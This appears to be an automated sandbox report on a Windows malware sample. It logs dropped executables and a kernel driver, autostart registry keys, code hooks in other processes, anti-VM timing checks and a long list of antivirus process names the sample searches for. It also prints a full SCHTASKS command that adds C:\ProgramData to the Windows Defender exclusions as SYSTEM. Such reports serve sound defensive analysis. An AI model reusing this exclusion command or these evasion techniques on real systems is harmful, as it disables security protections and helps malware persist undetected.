Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: tbcore3u.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Section loaded: tbcore3u.dll

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Documents\lOXFJk.exe

File written: C:\Users\Public\Music\destopbak.ini

Jump to behavior

Source: 287438657364-7643738421.08.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 287438657364-7643738421.08.exe

Static file information: File size 30886912 > 1048576

Source: 287438657364-7643738421.08.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58c00

Source: 287438657364-7643738421.08.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: F:\Development\GS-DES\DES10.0\HKPROC\bin\x64\UnicodeRelease\HkApp.x64.pdb source: 287438657364-7643738421.08.exe
Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: lOXFJk.exe, 00000005.00000003.2506024651.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3526255282.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3526255282.000000000132E000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000000.2721373550.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, vhZp0W.exe, 00000027.00000002.3526029548.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, vhZp0W.exe, 00000028.00000002.2756189237.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, vhZp0W.exe, 00000028.00000000.2747027719.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, 1y6U0V.exe, 0000002B.00000002.2758444826.0000000000958000.00000002.00000001.01000000.0000000C.sdmp, 1y6U0V.exe, 0000002B.00000000.2750952839.0000000000958000.00000002.00000001.01000000.0000000C.sdmp, 1y6U0V.exe, 0000002C.00000000.2762170195.0000000000958000.00000002.00000001.01000000.0000000C.sdmp, 1y6U0V.exe, 0000002C.00000002.2778557665.0000000000958000.00000002.00000001.01000000.0000000C.sdmp, vhZp0W.exe, 0000002D.00000002.2778065459.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, vhZp0W.exe, 0000002D.00000000.2763117878.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, vhZp0W.exe, 0000002E.00000002.3328846479.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, vhZp0W.exe, 0000002E.00000000.3319675014.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, 1y6U0V.exe, 0000002F.00000000.3321325618.0000000000958000.00000002.00000001.01000000.0000000C.sdmp, 1y6U0V.exe, 0000002F.00000002.3329795328.0000000000958000.00000002.00000001.01000000.0000000C.sdmp, vhZp0W.exe.5.dr, 1y6U0V.exe.39.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe, 00000004.00000000.2264514423.0000000140014000.00000002.00000001.01000000.00000008.sdmp, lOXFJk.exe, 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmp, lOXFJk.exe, 00000005.00000000.2283669117.0000000140014000.00000002.00000001.01000000.00000008.sdmp, lOXFJk.exe.0.dr

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe

Unpacked PE file: 39.2.vhZp0W.exe.5750000.7.unpack

Source: C:\Users\user\Documents\lOXFJk.exe

Code function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_000000014000F000

Source: initial sample

Static PE information: section where entry point is pointing to: .mo:

Source: tbcore3U.dll.5.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.5.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.5.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.39.dr	Static PE information: section name: .mo:

Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe

Code function: 43_2_00952691 push ecx; ret

43_2_009526A4

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	File created: C:\Users\user\Documents\lOXFJk.exe			Jump to dropped file
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	File created: C:\Users\user\Documents\vselog.dll			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	File created: C:\Windows\System32\drivers\189atohci.sys	Jump to dropped file
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	File created: C:\Users\user\Documents\lOXFJk.exe	Jump to dropped file
Source: C:\Users\user\Documents\lOXFJk.exe	File created: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Jump to dropped file
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	File created: C:\Users\user\Documents\vselog.dll	Jump to dropped file
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	File created: C:\Program Files (x86)\b3aEb0H\tbcore3U.dll	Jump to dropped file
Source: C:\Users\user\Documents\lOXFJk.exe	File created: C:\Program Files (x86)\vhZp0W\tbcore3U.dll	Jump to dropped file
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	File created: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Jump to dropped file

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"

Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe

Registry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron

Jump to behavior

Source: C:\Users\user\Documents\lOXFJk.exe

4_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\lOXFJk.exe	Memory written: PID: 7200 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Memory written: PID: 7200 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Memory written: PID: 7296 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Memory written: PID: 7296 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Memory written: PID: 4336 base: 1300005 value: E9 8B 2F C0 75	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Memory written: PID: 4336 base: 76F02F90 value: E9 7A D0 3F 8A	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Memory written: PID: 4336 base: 16F0005 value: E9 8B 2F 81 75	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Memory written: PID: 4336 base: 76F02F90 value: E9 7A D0 7E 8A	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Memory written: PID: 1984 base: DA0005 value: E9 8B 2F 16 76
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Memory written: PID: 1984 base: 76F02F90 value: E9 7A D0 E9 89
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Memory written: PID: 1784 base: 880005 value: E9 8B 2F 68 76
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Memory written: PID: 1784 base: 76F02F90 value: E9 7A D0 97 89
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Memory written: PID: 5368 base: DD0005 value: E9 8B 2F 13 76
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Memory written: PID: 5368 base: 76F02F90 value: E9 7A D0 EC 89
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Memory written: PID: 3408 base: FC0005 value: E9 8B 2F F4 75
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Memory written: PID: 3408 base: 76F02F90 value: E9 7A D0 0B 8A
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Memory written: PID: 1220 base: 1500005 value: E9 8B 2F A0 75
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Memory written: PID: 1220 base: 76F02F90 value: E9 7A D0 5F 8A
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Memory written: PID: 5416 base: 13B0005 value: E9 8B 2F B5 75
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Memory written: PID: 5416 base: 76F02F90 value: E9 7A D0 4A 8A

Source: C:\Users\user\Documents\lOXFJk.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C681EB4
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C68B056
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C61183C
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C6A6E74
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C56F12B
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C5D080B
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C5D2089
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 41E01D5
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 3DF4F7E
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 3D2A400
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 3DE8F6F
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 3E91246
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 41750CF
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C5790FC
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C6E8092
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BE3A03F
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BF4CBDE
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BE390FC
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BF782C1
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C6D91B6
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C6C6565
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BECF839
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BEF8647
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BE38B19
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BE2F12B
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BE887AA
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BF59F9E
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C593E38
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C67A702
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C5BF34F
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C6D7912
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BE9080B
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BF25F8C
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C57A03F
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BE7F34F
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BED183C
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C665F8C
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	API/Special instruction interceptor: Address: 6C61C0AF
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BDADE34
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	API/Special instruction interceptor: Address: 6BF991B6

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
Source: vhZp0W.exe, 00000027.00000002.3527148371.0000000003A6D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	RDTSC instruction interceptor: First address: 1400010C8 second address: 1400010DF instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	RDTSC instruction interceptor: First address: 1400010DF second address: 1400010DF instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F8114D481A0h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Documents\lOXFJk.exe	RDTSC instruction interceptor: First address: 4F569F5 second address: 4F56A03 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe

Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Source: C:\Users\user\Documents\lOXFJk.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_4-14017
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_43-3243

Source: C:\Users\user\Documents\lOXFJk.exe

API coverage: 2.7 %

Source: C:\Users\user\Documents\lOXFJk.exe TID: 5480	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe TID: 1244	Thread sleep time: -60000s >= -30000s	Jump to behavior
